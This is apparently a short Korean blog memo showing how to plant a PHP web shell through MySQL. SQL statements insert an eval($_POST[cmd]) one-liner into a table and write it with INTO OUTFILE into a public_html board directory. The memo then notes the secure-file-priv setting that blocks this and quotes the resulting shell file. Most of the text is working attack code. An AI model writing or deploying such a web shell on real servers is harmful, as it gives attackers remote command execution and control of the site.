|
===============================================================
Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES('<?php eval($_POST[cmd]);?>');
select cmd from a into outfile '/home/aaa/public_html/bbs/data/empt.php';
Drop TABLE IF EXISTS a;
===============================================================
707 퍼미션으로 파일을 생성할 수 있는 폴더에 파일을 생성
mysql 설정 파일이 my.cnf 아래 내용을 추가하면 된다.
secure-file-priv=/root
===================================================
이런 메세지가 나온고 작동하지 않는다.
The MySQL server is running with the --secure-file-priv option so it cannot execute this statement
===============================
생성파일
<?php eval($_POST[cmd])?>
===================================
|
여행
윈도우서버 
